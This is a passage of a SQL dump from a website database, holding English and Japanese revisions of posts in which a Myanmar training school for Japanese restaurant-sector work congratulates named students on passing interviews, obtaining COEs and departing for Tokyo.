data-entity-uuid=\"fbfdfda9-7e7e-4116-a701-e69262ed6c28\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/17_0.jpg\"><img data-entity-uuid=\"eae545a2-eb3b-4b3f-8784-dd48cbad9d48\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/18_0.jpg\"><img data-entity-uuid=\"6f53592e-cd27-4faf-8626-06e8ff195f50\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/19.jpg\"><img data-entity-uuid=\"d6c8469c-1b6a-4ea7-a07c-c03a2d7d1f57\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/20.jpg\">', '', 'full_html');
INSERT INTO `node_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('activities', 0, 98, 493, 'ja', 0, '<blockquote><h3><strong>NEW COMET第2期生向けレストラン実習授業の様子です。</strong></h3></blockquote><p>日本で特定外職に就くために十分な経験を積めないことを心配する必要はありません。あなたがすべきことは一生懸命勉強することだけです。そして面接に合格することが最優先事項です。</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/1_3.jpg\" data-entity-uuid=\"d18f27cd-d715-4b28-bbbb-0d66b137413a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/2_3.jpg\" data-entity-uuid=\"513ce649-00a4-4e66-ac9d-53af20aa48b5\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/3_3.jpg\" data-entity-uuid=\"25f3e96e-4512-46a6-b92f-ee8868ca846a\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/4_3.jpg\" data-entity-uuid=\"34d06090-f0cc-4ec8-937f-586a3252035c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/5_1.jpg\" data-entity-uuid=\"1caed8cb-fed6-4080-8df9-6de95a0f908d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/6_1.jpg\" data-entity-uuid=\"045afe86-0484-4003-b1c0-665a76524220\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/7_0.jpg\" data-entity-uuid=\"71665b06-ac33-416b-b7c5-61a8bbe946c3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/8_0.jpg\" data-entity-uuid=\"c7472549-3fe6-4aab-9f4f-75218dfb390e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/9_0.jpg\" data-entity-uuid=\"c09fa45d-fb6d-41fe-81cc-8861a942c7cf\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/10_0.jpg\" data-entity-uuid=\"b2ef25f0-89a4-461d-8b0b-e0306b3041db\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/11_5.jpg\" data-entity-uuid=\"d8f1ccf8-f54e-4940-8a11-74d011481187\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/12_0.jpg\" data-entity-uuid=\"7d5de3e5-0ed7-447b-bd64-0d789324043d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/13_0.jpg\" data-entity-uuid=\"775d5929-7013-4d99-86bd-aa0eb4faa580\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/14_0.jpg\" data-entity-uuid=\"08885aeb-3fe8-4c77-b2c4-be5c8f33b046\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/15_0.jpg\" data-entity-uuid=\"f23b1683-c5fe-4714-8537-5077371ebe00\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/16_0.jpg\" data-entity-uuid=\"cde4d163-3db2-433b-8299-9821cc3975e8\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/17_0.jpg\" data-entity-uuid=\"fbfdfda9-7e7e-4116-a701-e69262ed6c28\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/18_0.jpg\" data-entity-uuid=\"eae545a2-eb3b-4b3f-8784-dd48cbad9d48\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/19.jpg\" data-entity-uuid=\"6f53592e-cd27-4faf-8626-06e8ff195f50\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/20.jpg\" data-entity-uuid=\"d6c8469c-1b6a-4ea7-a07c-c03a2d7d1f57\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 99, 494, 'en', 0, '<blockquote><h2>Congralutations!</h2></blockquote><p>Congralutations NAN SU KHAING &amp; WUT YEE AUNG For Getting COE<img data-entity-uuid=\"e0ae44af-1d6d-4e8b-9ecd-316798168619\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nan%20su%20khaing.jpg\"><img data-entity-uuid=\"21038db9-238a-4cfd-a2e1-52e18586c7eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/wut%20yee%20aung.jpg\"></p>', '', 'full_html'),
('activities', 0, 99, 495, 'en', 0, '<blockquote><h2>Congralutations!</h2></blockquote><p>Congralutations NAN SU KHAING &amp; WUT YEE AUNG For Getting COE<img data-entity-uuid=\"e0ae44af-1d6d-4e8b-9ecd-316798168619\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/nan%20su%20khaing.jpg\"><img data-entity-uuid=\"21038db9-238a-4cfd-a2e1-52e18586c7eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/wut%20yee%20aung.jpg\"></p>', '', 'full_html'),
('activities', 0, 99, 495, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>NAN SU KHAING と WUT YEE AUNG、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/nan%20su%20khaing.jpg\" data-entity-uuid=\"e0ae44af-1d6d-4e8b-9ecd-316798168619\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/wut%20yee%20aung.jpg\" data-entity-uuid=\"21038db9-238a-4cfd-a2e1-52e18586c7eb\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 100, 496, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p><strong>Congratulations to BO BO ZAW for passing the Interview in Tokutei Gaishoku (Restaurant) !</strong></p><img data-entity-uuid=\"7615be17-84dd-45da-970d-25efa6e326ec\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/BO%20BO%20ZAW%2017-6-2024.jpg\">', '', 'full_html'),
('activities', 0, 100, 497, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p><strong>Congratulations to BO BO ZAW for passing the Interview in Tokutei Gaishoku (Restaurant) !</strong></p><img data-entity-uuid=\"7615be17-84dd-45da-970d-25efa6e326ec\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/BO%20BO%20ZAW%2017-6-2024.jpg\">', '', 'full_html'),
('activities', 0, 100, 497, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>BO BO ZAWさん、特定外食（レストラン）の面接に合格しました、おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/BO%20BO%20ZAW%2017-6-2024.jpg\" data-entity-uuid=\"7615be17-84dd-45da-970d-25efa6e326ec\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 101, 498, 'en', 0, '<blockquote><h2>Congratulations !</h2></blockquote><p>Congratulations to YAMIN PHYO for passing the Interview with Tokutei Gaishoku (Restaurant) !&nbsp;</p><img data-entity-uuid=\"ee2f4e43-eb50-4411-8634-6f66043ed641\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/YAMIN%20PHYO.jpg\">', '', 'full_html'),
('activities', 0, 101, 499, 'en', 0, '<blockquote><h2>Congratulations !</h2></blockquote><p>Congratulations to YAMIN PHYO for passing the Interview with Tokutei Gaishoku (Restaurant) !&nbsp;</p><img data-entity-uuid=\"ee2f4e43-eb50-4411-8634-6f66043ed641\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/YAMIN%20PHYO.jpg\">', '', 'full_html'),
('activities', 0, 101, 499, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YAMIN PHYOさん、特定飲食店の面接合格おめでとうございます！</strong></p><img src=\"/sites/default/files/inline-images/YAMIN%20PHYO.jpg\" data-entity-uuid=\"ee2f4e43-eb50-4411-8634-6f66043ed641\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 102, 500, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p>Congratulations <strong>THAE SU YATI SOE </strong>on passing the Interview with Tokutei Gaishuku (Restaurant)&nbsp;</p><img data-entity-uuid=\"53416c8f-dcd2-4fee-b113-b5f3ea65f6eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAE%20SU%20YATI%20SOE.jpg\">', '', 'full_html'),
('activities', 0, 102, 501, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS!</strong></h2></blockquote><p>Congratulations <strong>THAE SU YATI SOE </strong>on passing the Interview with Tokutei Gaishuku (Restaurant)&nbsp;</p><img data-entity-uuid=\"53416c8f-dcd2-4fee-b113-b5f3ea65f6eb\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/THAE%20SU%20YATI%20SOE.jpg\">', '', 'full_html'),
('activities', 0, 102, 501, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>THAE SU YATI SOE</strong>さん、特定飲食店の面接合格おめでとうございます.</p><img src=\"/sites/default/files/inline-images/THAE%20SU%20YATI%20SOE.jpg\" data-entity-uuid=\"53416c8f-dcd2-4fee-b113-b5f3ea65f6eb\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 103, 502, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KAW MYAR &amp; BUE MYAR SHAR &amp; EI EI NYEIN &amp; LAY LAY NAING &amp; NANG BWAR KYI &amp; PHRAY MYAR &amp; THU ZAR AUNG &amp; HNIN WAH KHINE<img data-entity-uuid=\"a0b2cab6-e2fa-4e17-b286-a43b4ea040fe\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hnin%20wah%20khine.jpg\"> For Getting COE<img src=\"/sites/default/files/inline-images/bue%20myar%20shar.jpg\" data-entity-uuid=\"28442e78-17b2-4af1-8e56-2ed752c87165\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20ei%20nyein.jpg\" data-entity-uuid=\"0903ad00-25dc-449e-875c-ba200b8b0cfb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/kaw%20myar.jpg\" data-entity-uuid=\"8a0634e8-499e-4ed8-8246-e5475de18a1e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lay%20lay%20naing.jpg\" data-entity-uuid=\"95524bf9-2393-4824-a33c-59c0cb39c2d3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/nang%20bwar%20kyi.jpg\" data-entity-uuid=\"c42d5524-5814-4e88-a72e-eef9aa53abba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/phray%20myar.jpg\" data-entity-uuid=\"1499fb56-2191-496d-9333-1f542fbd83ab\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thu%20zar%20aung.jpg\" data-entity-uuid=\"45605d03-339e-4503-979d-0a7ed27ca73b\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 103, 505, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KAW MYAR &amp; BUE MYAR SHAR &amp; EI EI NYEIN &amp; LAY LAY NAING &amp; NANG BWAR KYI &amp; PHRAY MYAR &amp; THU ZAR AUNG &amp; HNIN WAH KHINE<img data-entity-uuid=\"a0b2cab6-e2fa-4e17-b286-a43b4ea040fe\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hnin%20wah%20khine.jpg\"> For Getting COE<img src=\"/sites/default/files/inline-images/bue%20myar%20shar.jpg\" data-entity-uuid=\"28442e78-17b2-4af1-8e56-2ed752c87165\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20ei%20nyein.jpg\" data-entity-uuid=\"0903ad00-25dc-449e-875c-ba200b8b0cfb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/kaw%20myar.jpg\" data-entity-uuid=\"8a0634e8-499e-4ed8-8246-e5475de18a1e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lay%20lay%20naing.jpg\" data-entity-uuid=\"95524bf9-2393-4824-a33c-59c0cb39c2d3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/nang%20bwar%20kyi.jpg\" data-entity-uuid=\"c42d5524-5814-4e88-a72e-eef9aa53abba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/phray%20myar.jpg\" data-entity-uuid=\"1499fb56-2191-496d-9333-1f542fbd83ab\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thu%20zar%20aung.jpg\" data-entity-uuid=\"45605d03-339e-4503-979d-0a7ed27ca73b\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 103, 505, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p>KAW MYAR、BUE MYAR SHAR、EI EI NYEIN、LAY LAY NAING、NANG BWAR KYI、PHRAY MYAR、THU ZAR AUNG、HNIN WAH KHINE、COE 取得おめでとうございます<img src=\"/sites/default/files/inline-images/hnin%20wah%20khine.jpg\" data-entity-uuid=\"a0b2cab6-e2fa-4e17-b286-a43b4ea040fe\" data-entity-type=\"file\"> For Getting COE<img src=\"/sites/default/files/inline-images/bue%20myar%20shar.jpg\" data-entity-uuid=\"28442e78-17b2-4af1-8e56-2ed752c87165\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20ei%20nyein.jpg\" data-entity-uuid=\"0903ad00-25dc-449e-875c-ba200b8b0cfb\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/kaw%20myar.jpg\" data-entity-uuid=\"8a0634e8-499e-4ed8-8246-e5475de18a1e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lay%20lay%20naing.jpg\" data-entity-uuid=\"95524bf9-2393-4824-a33c-59c0cb39c2d3\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/nang%20bwar%20kyi.jpg\" data-entity-uuid=\"c42d5524-5814-4e88-a72e-eef9aa53abba\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/phray%20myar.jpg\" data-entity-uuid=\"1499fb56-2191-496d-9333-1f542fbd83ab\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thu%20zar%20aung.jpg\" data-entity-uuid=\"45605d03-339e-4503-979d-0a7ed27ca73b\" data-entity-type=\"file\"></p>', '', 'full_html'),
('activities', 0, 104, 503, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations KHAING SAPAL OO for passing TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"666edf96-9c03-4280-9178-e61455d2996e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20sapal%20oo.jpg\">', '', 'full_html'),
('activities', 0, 104, 504, 'en', 0, '<blockquote><p>CONGRATULATIONS!</p></blockquote><p>Congratulations KHAING SAPAL OO for passing TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"666edf96-9c03-4280-9178-e61455d2996e\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20sapal%20oo.jpg\">', '', 'full_html'),
('activities', 0, 104, 504, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><h6><strong>KHAING SAPAL OO</strong>さん、特定外食（レストラン）合格おめでとうございます！</h6><img src=\"/sites/default/files/inline-images/khaing%20sapal%20oo.jpg\" data-entity-uuid=\"666edf96-9c03-4280-9178-e61455d2996e\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 105, 506, 'en', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/hnin%20wai%20wai%20nwe.jpg\" data-entity-uuid=\"dc977b14-5c26-466f-9fdb-85acea3ec960\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thidar%20khine.jpg\" data-entity-uuid=\"577142fe-ad03-4878-b4d3-46335892032b\" data-entity-type=\"file\">Congratulations!</h2></blockquote><p>Congratulations HNIN WAI WAI NWE &amp; THIDAR KHINE For Getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'en', 0, '<blockquote><h2><img src=\"/sites/default/files/inline-images/hnin%20wai%20wai%20nwe.jpg\" data-entity-uuid=\"dc977b14-5c26-466f-9fdb-85acea3ec960\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thidar%20khine.jpg\" data-entity-uuid=\"577142fe-ad03-4878-b4d3-46335892032b\" data-entity-type=\"file\">Congratulations!</h2></blockquote><p>Congratulations HNIN WAI WAI NWE &amp; THIDAR KHINE For Getting COE</p>', '', 'full_html'),
('activities', 0, 105, 507, 'ja', 0, '<blockquote><h2>おめでとう！</h2><p>HNIN WAI WAI NWE さんと THIDAR KHINE さん、COE 取得おめでとうございます</p><img data-entity-uuid=\"b5d96eee-7fd7-4f70-b1b8-4c4090330ed3\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/hnin%20wai%20wai%20nwe_0.jpg\"><img data-entity-uuid=\"94c4c754-d793-45ac-ba7c-21cc18701640\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/thidar%20khine_0.jpg\"></blockquote>', '', 'full_html'),
('activities', 0, 106, 508, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>KHAING THAW THAW KHANT</strong> for passing TOKUTEI GAISHOKU (RESTAURANT) !&nbsp;</p><img data-entity-uuid=\"28cc69e0-4261-4e9c-84c3-ae7a54f94ca4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20thaw%20thaw%20khant.jpg\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 106, 509, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations <strong>KHAING THAW THAW KHANT</strong> for passing TOKUTEI GAISHOKU (RESTAURANT) !&nbsp;</p><img data-entity-uuid=\"28cc69e0-4261-4e9c-84c3-ae7a54f94ca4\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/khaing%20thaw%20thaw%20khant.jpg\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 106, 509, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>KHAING THAW THAW KHANT</strong> さん、特定外食 (レストラン) 合格おめでとうございます!</p><p>&nbsp;</p><img src=\"/sites/default/files/inline-images/khaing%20thaw%20thaw%20khant.jpg\" data-entity-uuid=\"28cc69e0-4261-4e9c-84c3-ae7a54f94ca4\" data-entity-type=\"file\"><p>&nbsp;</p><p>&nbsp;</p>', '', 'full_html'),
('activities', 0, 107, 510, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations PYAE SONE THU for passing Interview in TOKUTEI GAISHOKU (Restaurant)!</p><img data-entity-uuid=\"7fe289b8-da89-489c-93ef-1d01805746fa\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pyae%20sone%20thu.jpg\">', '', 'full_html'),
('activities', 0, 107, 511, 'en', 0, '<blockquote><h2>CONGRATULATIONS !&nbsp;</h2></blockquote><p>Congratulations PYAE SONE THU for passing Interview in TOKUTEI GAISHOKU (Restaurant)!</p><img data-entity-uuid=\"7fe289b8-da89-489c-93ef-1d01805746fa\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/pyae%20sone%20thu.jpg\">', '', 'full_html'),
('activities', 0, 107, 511, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>PYAE SONE THU</strong>さん、TOKUTEI GAISHOKU（レストラン）の面接に合格しました、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/pyae%20sone%20thu.jpg\" data-entity-uuid=\"7fe289b8-da89-489c-93ef-1d01805746fa\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 108, 512, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations THAN HTUN NAING &amp; AUNG PYAE PAING &amp; EI KHIN &amp; HTET WAI AUNG &amp; LWIN PHYO KO KO &amp; THAE KO KO &amp; YU YU NYEIN For Getting COE</p><img src=\"/sites/default/files/inline-images/aung%20pyae%20paing.jpg\" data-entity-uuid=\"cecab7e3-81ed-40f2-ab93-72147d2efe9d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20khin.jpg\" data-entity-uuid=\"1900d959-ad06-459a-8d33-acb6fd05c509\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/htet%20wai%20aung.jpg\" data-entity-uuid=\"cca3a267-7b48-4850-8b87-95178312d360\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lwin%20phyo%20ko%20ko.jpg\" data-entity-uuid=\"62627b2d-bb28-4558-98c4-d23242b3580c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ko%20ko.jpg\" data-entity-uuid=\"3c219092-fded-4ac5-8ea9-e0663dafb60b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/than%20htun%20naing.jpg\" data-entity-uuid=\"02e66c3c-e6c7-4998-abb7-da133f18c2b0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20yu%20nyein.jpg\" data-entity-uuid=\"ba953d4c-6760-4d6c-9a38-888cd7beaab2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 108, 513, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations THAN HTUN NAING &amp; AUNG PYAE PAING &amp; EI KHIN &amp; HTET WAI AUNG &amp; LWIN PHYO KO KO &amp; THAE KO KO &amp; YU YU NYEIN For Getting COE</p><img src=\"/sites/default/files/inline-images/aung%20pyae%20paing.jpg\" data-entity-uuid=\"cecab7e3-81ed-40f2-ab93-72147d2efe9d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20khin.jpg\" data-entity-uuid=\"1900d959-ad06-459a-8d33-acb6fd05c509\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/htet%20wai%20aung.jpg\" data-entity-uuid=\"cca3a267-7b48-4850-8b87-95178312d360\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lwin%20phyo%20ko%20ko.jpg\" data-entity-uuid=\"62627b2d-bb28-4558-98c4-d23242b3580c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ko%20ko.jpg\" data-entity-uuid=\"3c219092-fded-4ac5-8ea9-e0663dafb60b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/than%20htun%20naing.jpg\" data-entity-uuid=\"02e66c3c-e6c7-4998-abb7-da133f18c2b0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20yu%20nyein.jpg\" data-entity-uuid=\"ba953d4c-6760-4d6c-9a38-888cd7beaab2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 108, 513, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2><p>THAN HTUN NAING、AUNG PYAE PAING、EI KHIN、HTET WAI AUNG、LWIN PHYO KO KO、THAE KO KO、YU YU NYEIN の COE 取得おめでとうございます</p></blockquote><img src=\"/sites/default/files/inline-images/aung%20pyae%20paing.jpg\" data-entity-uuid=\"cecab7e3-81ed-40f2-ab93-72147d2efe9d\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/ei%20khin.jpg\" data-entity-uuid=\"1900d959-ad06-459a-8d33-acb6fd05c509\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/htet%20wai%20aung.jpg\" data-entity-uuid=\"cca3a267-7b48-4850-8b87-95178312d360\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/lwin%20phyo%20ko%20ko.jpg\" data-entity-uuid=\"62627b2d-bb28-4558-98c4-d23242b3580c\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/thae%20ko%20ko.jpg\" data-entity-uuid=\"3c219092-fded-4ac5-8ea9-e0663dafb60b\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/than%20htun%20naing.jpg\" data-entity-uuid=\"02e66c3c-e6c7-4998-abb7-da133f18c2b0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/yu%20yu%20nyein.jpg\" data-entity-uuid=\"ba953d4c-6760-4d6c-9a38-888cd7beaab2\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 109, 514, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS !</strong></h2></blockquote><p>Congratulations CHAN MYAE THU for passing Interview for TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"0d3f7bc6-2289-4c43-a00d-72103c198982\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/chan%20myae%20thu.jpg\">', '', 'full_html'),
('activities', 0, 109, 515, 'en', 0, '<blockquote><h2><strong>CONGRATULATIONS !</strong></h2></blockquote><p>Congratulations CHAN MYAE THU for passing Interview for TOKUTEI GAISHOKU (Restaurant) !&nbsp;</p><img data-entity-uuid=\"0d3f7bc6-2289-4c43-a00d-72103c198982\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/chan%20myae%20thu.jpg\">', '', 'full_html'),
('activities', 0, 109, 515, 'ja', 0, '<blockquote><h2><strong>おめでとうございます！</strong></h2></blockquote><p><strong>CHAN MYAE THU</strong>さん、TOKUTEI GAISHOKU（レストラン）の面接に合格しました、おめでとうございます！</p><img src=\"/sites/default/files/inline-images/chan%20myae%20thu.jpg\" data-entity-uuid=\"0d3f7bc6-2289-4c43-a00d-72103c198982\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 110, 516, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations YAW CHANG for passing the Interview TOKUTEI GAISHOKU (RESTAURANT)!&nbsp;</p><img data-entity-uuid=\"2d3598bb-8b81-443f-a1f8-00997d76aa2f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yaw%20chang.jpg\">', '', 'full_html'),
('activities', 0, 110, 517, 'en', 0, '<blockquote><h2>CONGRATULATIONS!</h2></blockquote><p>Congratulations YAW CHANG for passing the Interview TOKUTEI GAISHOKU (RESTAURANT)!&nbsp;</p><img data-entity-uuid=\"2d3598bb-8b81-443f-a1f8-00997d76aa2f\" data-entity-type=\"file\" src=\"/sites/default/files/inline-images/yaw%20chang.jpg\">', '', 'full_html'),
('activities', 0, 110, 517, 'ja', 0, '<blockquote><h2>おめでとうございます！</h2></blockquote><p><strong>YAW CHANG</strong>さん、特定外食（レストラン）面接合格おめでとうございます！</p><img src=\"/sites/default/files/inline-images/yaw%20chang.jpg\" data-entity-uuid=\"2d3598bb-8b81-443f-a1f8-00997d76aa2f\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 111, 518, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KHIN KHIN KYAW &amp; THET MYAT MYAT KHINE &amp; HNIN THAZIN AUNG &amp; WIN PYAE SHAN &amp; YU YU NWAY For departure to big city of japan(Tokyo) in (11:35Am) with Tokutei Gaishoku Visa.Wishing for a better opportunity and health in Japan.</p><img src=\"/sites/default/files/inline-images/0-02-01-09af1556503cf895dc500a57405f7aa13bda935f637a35f55b84172b11f2a2ae_d81fb0503c8b859b.jpg\" data-entity-uuid=\"1d399c1c-d9d3-448c-aa45-06b499fbf9b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aa1636055b47104715df7e99e33ca9902c656871af49c4863a99ac3efcbc0279_227b57d23debae7c.jpg\" data-entity-uuid=\"f726a3fc-4a54-40eb-94b1-ed5ae6f33a7e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-c00edf6b50b4e5f2cd07650374690479f7dddefba6627e6fb334a01e67f6ea28_153d57af8899ba69.jpg\" data-entity-uuid=\"12109f45-4ed9-46f9-9a48-bb4ba36ed3d0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-dde55e97ef8570451473e9ba3c39964756ff73cce6ea1328cb68b967d9ea335e_f57cf6e077154eb6.jpg\" data-entity-uuid=\"8a2b75db-1149-475d-beaa-537ad6296fc0\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-de1713cd42ca8420f980eec7f16f47b1a1ff1ee72432726e2ea27ed343cae8bf_da46f9ee7892a8f5.jpg\" data-entity-uuid=\"c96199f9-2828-4fbf-bd04-97c48cb5b0a1\" data-entity-type=\"file\">', '', 'full_html'),
('activities', 0, 111, 519, 'en', 0, '<blockquote><h2>Congratulations!</h2></blockquote><p>Congratulations KHIN KHIN KYAW &amp; THET MYAT MYAT KHINE &amp; HNIN THAZIN AUNG &amp; WIN PYAE SHAN &amp; YU YU NWAY For departure to big city of japan(Tokyo) in (11:35Am) with Tokutei Gaishoku Visa.Wishing for a better opportunity and health in Japan.</p><img src=\"/sites/default/files/inline-images/0-02-01-09af1556503cf895dc500a57405f7aa13bda935f637a35f55b84172b11f2a2ae_d81fb0503c8b859b.jpg\" data-entity-uuid=\"1d399c1c-d9d3-448c-aa45-06b499fbf9b2\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-aa1636055b47104715df7e99e33ca9902c656871af49c4863a99ac3efcbc0279_227b57d23debae7c.jpg\" data-entity-uuid=\"f726a3fc-4a54-40eb-94b1-ed5ae6f33a7e\" data-entity-type=\"file\"><img src=\"/sites/default/files/inline-images/0-02-01-c00edf6b50b4e5f2cd07650374690479f7dddefba6627e6fb334a01e67f6ea28_153d57af8899ba69.jpg\" 